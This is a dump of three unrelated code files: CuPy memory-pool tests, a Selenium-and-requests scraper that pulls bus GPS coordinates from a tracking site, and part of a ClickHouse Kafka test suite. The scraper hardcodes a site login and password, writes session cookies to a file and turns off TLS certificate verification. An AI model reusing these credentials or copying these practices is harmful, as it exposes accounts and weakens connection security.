@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='free_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_free_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.free_bytes()
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='free_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_free_bytes2(self):
# Note: MemoryAsyncPool works differently from MemoryPool. The first
# allocation would be much bigger than requested, and the pool size
# increases as needed. As a result, this test method is very different
# from TestSingleDeviceMemoryPool.test_free_bytes(), in that the pool
# size is a fixed value (outside of our control).
p1 = self.pool.malloc(self.unit * 2)
assert self.pool.free_bytes() == (
self.pool.total_bytes() - self.pool.used_bytes()) # always true
# current_size is fixed throughout this test, as no synchronization
# (such as free_all_blocks()) is done
current_size = self.pool.total_bytes()
free_size = self.pool.free_bytes()
p2 = self.pool.malloc(self.unit * 4)
free_size -= self.unit * 4
assert self.pool.free_bytes() == free_size
del p2
free_size += self.unit * 4
assert self.pool.free_bytes() == free_size
del p1
free_size += self.unit * 2
assert self.pool.free_bytes() == free_size
p3 = self.pool.malloc(self.unit * 1)
free_size -= self.unit * 1
assert self.pool.free_bytes() == free_size
del p3
assert self.pool.total_bytes() == current_size
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='free_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_free_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.pool.free_bytes() == (
self.pool.total_bytes() - self.pool.used_bytes()) # always true
del p2
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='total_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_total_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.total_bytes()
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='total_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_total_bytes2(self):
# Note: MemoryAsyncPool works differently from MemoryPool. The first
# allocation would be much bigger than requested, and the pool size
# increases as needed. As a result, this test method is very different
# from TestSingleDeviceMemoryPool.test_total_bytes(), in that the pool
# size is either 0 or a fixed value (outside of our control).
p1 = self.pool.malloc(self.unit * 2)
current_size = self.pool.total_bytes()
assert current_size == self.pool.total_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert current_size == self.pool.total_bytes()
del p1
assert current_size == self.pool.total_bytes()
del p2
assert current_size == self.pool.total_bytes()
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert current_size == self.pool.total_bytes()
assert (self.pool.used_bytes() + self.pool.free_bytes()
== self.pool.total_bytes())
del p3
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='total_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_total_bytes_stream(self):
# Note: MemoryAsyncPool works differently from MemoryPool. The first
# allocation would be much bigger than requested, and the pool size
# increases as needed. As a result, this test method is very different
# from TestSingleDeviceMemoryPool.test_total_bytes_stream(), in that
# the pool size is either 0 or a fixed value (outside of our control).
p1 = self.pool.malloc(self.unit * 4)
current_size = self.pool.total_bytes()
assert current_size > 0
del p1
assert current_size > 0
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert current_size == self.pool.total_bytes()
del p2
def test_get_limit(self):
# limit is disabled by default
assert 2**64-1 == self.pool.get_limit()
def test_set_limit_size(self):
self.pool.set_limit(size=1024)
assert 1024 == self.pool.get_limit()
self.pool.set_limit(size=2**33)
assert 2**33 == self.pool.get_limit()
self.pool.set_limit(size=0)
assert 2**64-1 == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(size=-1)
def test_set_limit_fraction(self):
_, total = cupy.cuda.runtime.memGetInfo()
self.pool.set_limit(fraction=0)
assert 2**64-1 == self.pool.get_limit()
self.pool.set_limit(fraction=0.5)
assert total * 0.5 == self.pool.get_limit()
self.pool.set_limit(fraction=1.0)
assert total == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=-1)
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=1.1)
|
get_coords.py
|
import requests
import json
from selenium import webdriver
import csv
from time import sleep
from datetime import date,timedelta
from threading import Thread
from concurrent.futures import ThreadPoolExecutor
import os
from reverse_geocoding import *
import urllib3
urllib3.disable_warnings()
progress_count = 0
#Bus id
# For SAM series : 272 + bus-number
# For ABP series : 666 + bus-number
# For ARR series : 509 + bus-number
# For ATP series : 717 + bus-number
# For CSR series : 523 + bus-number
# For SMD series : 761 + bus-number
# For SMT series : 804 + bus-number
# For TBO series : 848 + bus-number
# For TKR series : 507 + bus-number
# For ARM series : 355 + bus-number
# For CSM series : 376 + bus-number
# For TKM series : 361 + bus-number
#hours --> hours-6 (if -ve start reducing from 24)
# eg:
# 22 --> 16
# 5 --> 23
#minutes --> tens digit - 3 (if -ve start reducing from 6)
# eg:
# 42 --> 12
# 22 --> 52
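# Worked example (added for clarity) matching CoordinateSearch.tune_data() below:
# local time 08:42:00 on 2020-03-17 is encoded as
#   hour:    8 - 6            -> 2
#   minutes: tens digit 4 - 3 -> 1, ones digit unchanged -> "12"
# giving the request timestamp "2020-03-17T2:12:00.000Z". The hour and the minute
# tens digit wrap independently (modulo 24 and 6), so this is not the same as
# subtracting a fixed timedelta.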
class CoordinateSearch:
def __init__(self,cookie=None,bus_name="",interval=10,date=0,id=0):
print('Search for {} started'.format(bus_name))
if cookie is None:
with open('cookies.log','r') as file:
self.cookie = file.read()
else:
self.cookie = cookie
self.progress = 0
self.id = id
self.ids = {'SAM':272,
'ABP':666,
'ARR':509,
'ATP':717,
'CSR':523,
'SMD':761,
'SMT':804,
'TBO':848,
'TKR':507,
'ARM':355,
'CSM':376,
'TKM':361}
self.date = date
self.hour_counter = 8
self.name = bus_name
# self.id = self.get_id(bus_name)
self.data_list = []
# self.data_list.append(['Date','Time','Latitude','Longitude'])
self.interval = interval
self.data = {}
self.cookies_arg = {'JSESSIONID':self.cookie}
self.data_arg = {"type":"ASSET","ids":[self.id],"start":"2020-03-16T16:36:39.000Z","end":"2020-03-16T16:37:40.000Z","rtl":False}
self.headers_arg = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'en-US,en;q=0.5',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/json;charset=utf-8',
'Referer':'https://ajlavls.in/abpp/',
'Connection':'close',
'Origin':'https://ajlavls.in'}
def change_args(self,**kwargs):
# self.data_arg[kwargs.keys()[0]] = kwargs[kwargs.keys()[0]]
for key in kwargs.keys():
self.data_arg[key] = kwargs[key]
def get_cookie(self):
self.driver = webdriver.Chrome()
self.driver.get("https://ajlavls.in/abpp/#/login")
sleep(3)
self.driver.find_element_by_xpath("/html/body/div/div/div/div/div[2]/div[2]/form/div[1]/input").send_keys('A_Yhonk')
self.driver.find_element_by_xpath("/html/body/div/div/div/div/div[2]/div[2]/form/div[2]/input").send_keys('A_Yhonk@123')
self.driver.find_element_by_xpath("/html/body/div/div/div/div/div[2]/div[2]/form/div[3]/div/input").click()
sleep(3)
cookies = self.driver.get_cookies()
with open('cookies.log','w') as file:
file.write(str(cookies[0]['value']))
self.cookie = str(cookies[0]['value'])
self.cookies_arg = {'JSESSIONID':self.cookie}
self.driver.close()
self.start()
def get_id(self,name):
# bus_number = int(name[3:])
# bus_series = name[:3]
# return (self.ids[bus_series] + bus_number)
return 559
def start(self):
self.get_data(self.date,self.date,'08:00:00','08:01:00')
def tune_data(self,date,time):
start = date + "T"
data = time.split(":")
hour = int(data[0])
minutes = data[1]
seconds = str(data[2])
tmp = hour - 6
if tmp < 0:
h = 24 + tmp
else:
h = tmp
start += str(h)
#Minutes
tmp = int(minutes[0]) - 3
if tmp < 0:
h = 6 + tmp
else:
h = tmp
h2 = str(h) + minutes[1]
start += ':' + h2 + ':' + seconds + '.000Z'
# print(start)
return start
def get_data(self,from_date,to_date,from_time,to_time):
if self.hour_counter >= 20:
return
start = self.tune_data(from_date,from_time)
end = self.tune_data(to_date,to_time)
self.change_args(start=start,end=end)
req = requests.post('https://ajlavls.in/abpp/rest/mrt',verify=False,data=json.dumps(self.data_arg),
headers=self.headers_arg,cookies=self.cookies_arg)
if req.status_code == 405 or req.status_code == 400:
self.get_cookie()
return
data = json.loads(req.text)
try:
longitude = data['assets'][str(self.id)]['logs'][0]['lon']
latitude = data['assets'][str(self.id)]['logs'][0]['lat']
except Exception as e:
latitude = 0
longitude = 0
with open('logs.txt','a') as f:
f.write(str(e) + '\n')
self.data[from_date + " " + self.change(from_time)] = [latitude,longitude]
self.data_list.append([from_date,self.change(from_time),latitude,longitude])
self.progress += 1
# print('{}% done'.format(str((self.progress/72)*100)[:4]))
self.get_next(from_date,to_date,from_time,to_time)
def change(self,time):
data = time.split(':')
data[0] = str(self.hour_counter)
return ':'.join(data)
    def get_next(self,from_date,to_date,from_time,to_time):
        # Advance the one-minute query window and recurse back into get_data();
        # the sweep stops once self.hour_counter reaches 20.
        data = from_time.split(":")
hour = int(data[0])
minutes = int(data[1])
seconds = str(data[2])
tmp = minutes + 10
if tmp == 30:
hour += 1
if tmp >= 60:
minutes = '00'
self.hour_counter += 1
from_time = str(hour) + ':' + '00' + ':' + str(seconds)
to_time = str(hour) + ':' + '01' + ':' + str(seconds)
else:
minutes = tmp
from_time = str(hour) + ':' + str(minutes) + ':' + str(seconds)
to_time = str(hour) + ':' + str(int(minutes)+1) + ':' + str(seconds)
self.get_data(from_date,to_date,from_time,to_time)
def extract_data(self,List=False):
if List:
return self.data_list
else:
return self.data
# main = CoordinateSearch(cookie="01B23455F0C58D44BB3A9E09A17E1FB3",
# bus_name="ARR27",date="2020-03-17")
# main = CoordinateSearch(bus_name="ARR27",date="2020-03-17")
# main.start()
# with open('SAM8.csv','w') as f:
# writer = csv.writer(f)
# writer.writerows(main.extract_data(List=True))
def start(bus,id,dates):
global progress_count
main_data = []
csv_data = [
['Date','Time','Latitude','Longitude']
]
for date in dates:
main = CoordinateSearch(bus_name=bus,date=date,id=id)
main.start()
main_data.append(main.extract_data(List=True))
for i in main_data:
for x in i:
csv_data.append(x)
# os.chdir('Data')
with open('{}.csv'.format(bus),'w') as file:
csv_writer = csv.writer(file)
csv_writer.writerows(csv_data)
progress_count += 1
print("[*] {}/100 buses done".format(str(progress_count)))
def main():
thread_pool = ThreadPoolExecutor(max_workers=10)
start_date = str(input("Please enter start date (YYYY-MM-DD) : ")).split('-')
start_date = date(int(start_date[0]),int(start_date[1]),int(start_date[2]))
end_date = str(input("Please enter end date (YYYY-MM-DD) : ")).split('-')
end_date = date(int(end_date[0]),int(end_date[1]),int(end_date[2]))
delta = end_date - start_date
dates = []
for i in range(delta.days + 1):
day = start_date + timedelta(days=i)
dates.append(str(day))
with open('buses.txt','r') as file:
for line in file.readlines():
data = line.split(',')
thread_pool.submit(start,data[0],int(data[1]),dates)
# search_thread = Thread(target=start,args=(data[0],int(data[1]),dates))
# search_thread.start()
# print('[*] Search for {} started'.format(data[0]))
# search_thread.join()
thread_pool.shutdown()
if __name__ == '__main__':
main()
test.py
import json
import os.path as p
import random
import socket
import threading
import time
import logging
import io
import string
import ast
import math
import avro.schema
import avro.io
import avro.datafile
from confluent_kafka.avro.cached_schema_registry_client import CachedSchemaRegistryClient
from confluent_kafka.avro.serializer.message_serializer import MessageSerializer
import kafka.errors
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.protocol.admin import DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
from kafka.admin import NewTopic
# protoc --version
# libprotoc 3.0.0
# # to create kafka_pb2.py
# protoc --python_out=. kafka.proto
from . import kafka_pb2
from . import social_pb2
from . import message_with_repeated_pb2
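# The generated kafka_pb2 module is assumed to be built (with the protoc invocation shown
# above) from a schema roughly like the sketch below; field names and types are inferred
# from how KeyValuePair is used further down and may differ from the real kafka.proto:
#
#   syntax = "proto3";
#   message KeyValuePair {
#       uint64 key = 1;
#       string value = 2;
#   }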
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/kafka.xml', 'configs/named_collection.xml'],
user_configs=['configs/users.xml'],
with_kafka=True,
with_zookeeper=True, # For Replicated Table
macros={"kafka_broker":"kafka1",
"kafka_topic_old":"old",
"kafka_group_name_old":"old",
"kafka_topic_new":"new",
"kafka_group_name_new":"new",
"kafka_client_id":"instance",
"kafka_format_json_each_row":"JSONEachRow"},
clickhouse_path_dir='clickhouse_path')
def get_kafka_producer(port, serializer, retries):
errors = []
for _ in range(retries):
try:
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(port), value_serializer=serializer)
logging.debug("Kafka Connection establised: localhost:{}".format(port))
return producer
except Exception as e:
errors += [str(e)]
time.sleep(1)
raise Exception("Connection not establised, {}".format(errors))
def producer_serializer(x):
return x.encode() if isinstance(x, str) else x
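# Minimal usage sketch for the two helpers above (the port and payload are illustrative):
#
#   producer = get_kafka_producer(9092, producer_serializer, retries=15)
#   producer.send(topic='some_topic', value='{"key": 0, "value": 0}')
#   producer.flush()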
def kafka_create_topic(admin_client, topic_name, num_partitions=1, replication_factor=1, max_retries=50, config=None):
logging.debug(f"Kafka create topic={topic_name}, num_partitions={num_partitions}, replication_factor={replication_factor}")
topics_list = [NewTopic(name=topic_name, num_partitions=num_partitions, replication_factor=replication_factor, topic_configs=config)]
retries = 0
while True:
try:
admin_client.create_topics(new_topics=topics_list, validate_only=False)
logging.debug("Admin client succeed")
return
except Exception as e:
retries += 1
time.sleep(0.5)
if retries < max_retries:
logging.warning(f"Failed to create topic {e}")
else:
raise
def kafka_delete_topic(admin_client, topic, max_retries=50):
result = admin_client.delete_topics([topic])
for (topic, e) in result.topic_error_codes:
if e == 0:
logging.debug(f"Topic {topic} deleted")
else:
logging.error(f"Failed to delete topic {topic}: {e}")
retries = 0
while True:
topics_listed = admin_client.list_topics()
logging.debug(f"TOPICS LISTED: {topics_listed}")
if topic not in topics_listed:
return
else:
retries += 1
time.sleep(0.5)
if retries > max_retries:
raise Exception(f"Failed to delete topics {topic}, {result}")
def kafka_produce(kafka_cluster, topic, messages, timestamp=None, retries=15):
logging.debug("kafka_produce server:{}:{} topic:{}".format("localhost", kafka_cluster.kafka_port, topic))
producer = get_kafka_producer(kafka_cluster.kafka_port, producer_serializer, retries)
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
## just to ensure the python client / producer is working properly
def kafka_producer_send_heartbeat_msg(max_retries=50):
kafka_produce(kafka_cluster, 'test_heartbeat_topic', ['test'], retries=max_retries)
def kafka_consume(kafka_cluster, topic, needDecode = True, timestamp = 0):
consumer = KafkaConsumer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), auto_offset_reset="earliest")
    consumer.subscribe(topics=[topic])
for toppar, messages in list(consumer.poll(5000).items()):
if toppar.topic == topic:
for message in messages:
assert timestamp == 0 or message.timestamp / 1000 == timestamp
if needDecode:
yield message.value.decode()
else:
yield message.value
consumer.unsubscribe()
consumer.close()
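# Usage sketch: kafka_consume is a generator yielding the values read from a topic, e.g.
#
#   for value in kafka_consume(kafka_cluster, 'some_topic'):
#       print(value)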
def kafka_produce_protobuf_messages(kafka_cluster, topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, topic, start_index, num_messages):
    producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
producer.send(topic=topic, value=serialized_msg)
producer.flush()
logging.debug("Produced {} messages for topic {}".format(num_messages, topic))
def kafka_produce_protobuf_social(kafka_cluster,topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = social_pb2.User()
msg.username='John Doe {}'.format(i)
msg.timestamp=1000000+i
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def avro_message(value):
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
bytes_writer = io.BytesIO()
# writer = avro.io.DatumWriter(schema)
# encoder = avro.io.BinaryEncoder(bytes_writer)
# writer.write(value, encoder)
# DataFileWrite seems to be mandatory to get schema encoded
writer = avro.datafile.DataFileWriter(bytes_writer, avro.io.DatumWriter(), schema)
if isinstance(value, list):
for v in value:
writer.append(v)
else:
writer.append(value)
writer.flush()
raw_bytes = bytes_writer.getvalue()
writer.close()
bytes_writer.close()
return raw_bytes
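# Usage sketch - a single row matching the schema above, or a list of such dicts to pack
# several rows into one Avro container message:
#
#   avro_message({'id': 0, 'blockNo': 0, 'val1': 'AM', 'val2': 0.5, 'val3': 1})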
def avro_confluent_message(schema_registry_client, value):
    # type: (CachedSchemaRegistryClient, dict) -> bytes
serializer = MessageSerializer(schema_registry_client)
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
return serializer.encode_record_with_schema('test_subject', schema, value)
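# Usage sketch (the subject name 'test_subject' is hard-coded above; the result is the
# Confluent wire format: a magic byte, the 4-byte schema id, then the Avro-encoded row):
#
#   avro_confluent_message(schema_registry_client, {'id': 0, 'blockNo': 0, 'val1': 'AM', 'val2': 0.5, 'val3': 1})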
# Tests
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n')
SETTINGS kafka_commit_on_select = 1;
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_commit_on_select = 1,
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
    # Insert a couple of malformed messages.
kafka_produce(kafka_cluster, 'new', ['}{very_broken_message,'])
kafka_produce(kafka_cluster, 'new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'new')
assert members[0]['client_id'] == 'instance test 1234'
def test_kafka_json_as_string(kafka_cluster):
kafka_produce(kafka_cluster, 'kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }',
'{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
# 'tombstone' record (null value) = marker of deleted record
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='kafka_json_as_string', key='xxx')
producer.flush()
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_commit_on_select = 1,
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
assert instance.contains_in_log(
"Parsing of message (topic: kafka_json_as_string, partition: 0, offset: [0-9]*) return no rows")
def test_kafka_formats(kafka_cluster):
schema_registry_client = CachedSchemaRegistryClient('http://localhost:{}'.format(kafka_cluster.schema_registry_port))
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
    # data was dumped from clickhouse itself in the following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
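    # Each entry of all_formats maps a format name to:
    #   'data_sample'          - three Kafka messages: a single row (id 0), rows 1..15 packed
    #                            into one message, and the single row again,
    #   'supports_empty_value' - optional flag for formats where an empty message parses
    #                            cleanly (the commented stack traces below record the
    #                            formats where it does not),
    #   'extra_settings'       - optional extra engine SETTINGS (schema, template, regexp)
    #                            needed by the format.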
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
        # JSONAsString doesn't fit this test and is tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
],
'supports_empty_value': True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# ''
# On empty message exception: Cannot parse input: expected '[' at end of stream., Stack trace (when copying this message, always include the lines below):
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/JSONCompactEachRowRowInputFormat.cpp:0: DB::JSONCompactEachRowRowInputFormat::readPrefix() @ 0x1dee6bd6 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# ''
# On empty message exception: Unexpected end of stream while reading key name from TSKV format
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:88: DB::readName(DB::ReadBuffer&, StringRef&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) @ 0x1df8c098 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:114: DB::TSKVRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df8ae3e in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
